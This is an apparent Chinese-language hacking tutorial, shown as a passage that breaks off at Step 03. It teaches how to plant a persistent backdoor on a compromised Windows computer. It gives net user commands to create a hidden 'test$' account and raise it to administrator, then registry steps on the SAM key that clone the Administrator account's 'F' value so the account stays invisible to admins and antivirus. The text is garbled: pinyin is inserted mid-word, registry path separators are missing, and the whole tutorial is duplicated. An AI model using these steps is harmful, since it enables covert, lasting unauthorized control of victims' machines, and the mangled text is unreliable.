黑客在入侵目標後，通常會在（zài）目標電腦上留下（xià）後門，以便長期控製這台電腦。可是後門終歸是黑客工具，是（shì）殺毒軟（ruǎn）件的查殺目（mù）標之一，可能（néng）殺毒軟件升（shēng）級後後門就被刪除了。但（dàn）是有一種後門是永遠不（bú）會被殺毒軟件查殺的，就是隱藏的（de）係統克隆帳戶。

★編輯提示：

克隆（lóng）帳戶（hù）是最隱蔽的後門

在Windows中，每一（yī）個帳戶在（zài）注冊表（biǎo）中都有（yǒu）對應的鍵值，這（zhè）個（gè）鍵值影響著該帳戶的權限。當黑客在注冊表中動手腳複製鍵值後，就可以（yǐ）將一個用戶權（quán）限的帳戶（hù）克隆（lóng）成具有管理員權（quán）限的帳戶，並且將這（zhè）個帳戶進（jìn）行隱藏。隱藏後的帳（zhàng）戶無論是在（zài）“用戶管理”還是“命令（lìng）提示符（fú）”中都是不可（kě）見的。因此一般的計算機管（guǎn）理員很少會發現隱藏帳戶，危害十（shí）分巨（jù）大。

用命令行模式（shì）添加帳戶

點擊“開始”→“運行”，輸入（rù）“cmd”運行（háng）“命令提示符”，輸入如下命令：net user test$ /add並回車，這樣（yàng）就可以在係統中建（jiàn）立（lì）一個名為test$的（de）帳（zhàng）戶。繼續（xù）輸入：net localgroup administrators test$ /add並回車，這樣就可以把test$帳戶提升（shēng）到管理員權限。

●添加一個隱藏（cáng）帳（zhàng）戶

Step 01點擊“開始”→“運（yùn）行”，輸入“regedt32.exe”後回車，彈出（chū）“注（zhù）冊表編輯器”。在regedt32.exe中來到“HKEY_LOCAL_MACHINESAMSAM”處，點擊“編輯”菜單→“權限”，在彈出的“SAM的權限”編輯窗口中（zhōng）選中“administrators”帳戶，在下方的權限設置處勾尋完全控製”，完成後點擊“確定”即可（kě）。

●設置注冊表操作權限

Step 02在“運行”中輸入“regedit.exe”運行（háng）“注冊表編輯器”，定位（wèi）到“HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames”處，點擊隱藏帳戶（hù）“test$”，在右邊顯（xiǎn）示的鍵值中的（de）“類型”一項（xiàng）顯示（shì）為0x404，向上來（lái）到“HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers”處，可以找到“00000404”這一項，這兩者是相互對應的，隱藏帳戶“test$”的所有信息都（dōu）在“00000404”這一項中。同（tóng）樣的，我們可以找（zhǎo）到“administrator”帳戶所對（duì）應的項為“000001F4”。

Step 03將“test$”的鍵值導出為test$.reg，同時將“00000404”和“000001F4”項的F鍵值分別導出為user.reg，admin.reg。用“記事本”打開admin.reg，將其中“F”值後麵的內容複製下來，替換user.reg中的“F”值內容，完成後保（bǎo）存（cún）。

黑客在（zài）入侵目標後，通常（cháng）會在目標電腦上留下後門，以便長（zhǎng）期控製這（zhè）台電腦。可是後門（mén）終歸是黑客工（gōng）具，是殺毒軟（ruǎn）件的查殺（shā）目標之一，可能殺毒軟件升（shēng）級後後門就被刪除了。但是有一種後門是永遠不會被殺毒軟件查殺的，就是隱藏的係統克隆帳戶。

★編輯提示：

克隆帳戶是最隱蔽的後門

在Windows中，每一個帳戶在注冊表中都有（yǒu）對應的鍵值，這個鍵值影響著該帳戶（hù）的權限。當黑客在注冊表中動手腳複製鍵值後，就可以將一個用戶權限的（de）帳戶克隆成具有管理員權限的帳戶（hù），並且將這個帳戶進（jìn）行隱（yǐn）藏。隱藏後的帳戶無論是在（zài）“用戶管（guǎn）理”還（hái）是“命（mìng）令提示符”中都是不可見的。因此一般的計算機管理員很少會發現（xiàn）隱藏帳戶，危害十分（fèn）巨大。

用命令行模（mó）式添加帳（zhàng）戶

點擊“開始”→“運行”，輸入“cmd”運行“命令提示符”，輸入如下命（mìng）令：net user test$ /add並（bìng）回車，這樣就可以在係統（tǒng）中建立一個名為test$的帳（zhàng）戶。繼續輸入：net localgroup administrators test$ /add並（bìng）回車，這樣就可（kě）以把test$帳戶提升到管（guǎn）理員權（quán）限。

●添加一個隱藏（cáng）帳戶

Step 01點（diǎn）擊“開始”→“運行”，輸入（rù）“regedt32.exe”後（hòu）回車，彈（dàn）出“注冊表編輯器”。在regedt32.exe中來到“HKEY_LOCAL_MACHINESAMSAM”處，點擊（jī）“編輯”菜單→“權限”，在彈出的“SAM的權限”編輯窗口中選中“administrators”帳戶，在下（xià）方（fāng）的權限（xiàn）設置處勾尋完全控製（zhì）”，完成後點擊“確定”即可。

●設置注冊表操作權限

Step 02在“運行”中輸入“regedit.exe”運行“注冊（cè）表編輯（jí）器”，定位到“HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames”處，點擊隱（yǐn）藏帳戶“test$”，在右邊顯示的鍵值中的“類型”一項顯示為0x404，向上來到“HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers”處（chù），可以找到（dào）“00000404”這一項，這兩者是相互對應的，隱藏帳戶“test$”的所有信息都（dōu）在“00000404”這一項中。同樣（yàng）的，我們可以找到“administrator”帳戶（hù）所對應的項為“000001F4”。

Step 03將“test$”的鍵值導出為test$.reg，同時將“00000404”和“000001F4”項的F鍵值分別導出為user.reg，admin.reg。用“記事本”打開admin.reg，將（jiāng）其中“F”值後麵的（de）內容複製下來，替換（huàn）user.reg中（zhōng）的“F”值（zhí）內容，完成後保存。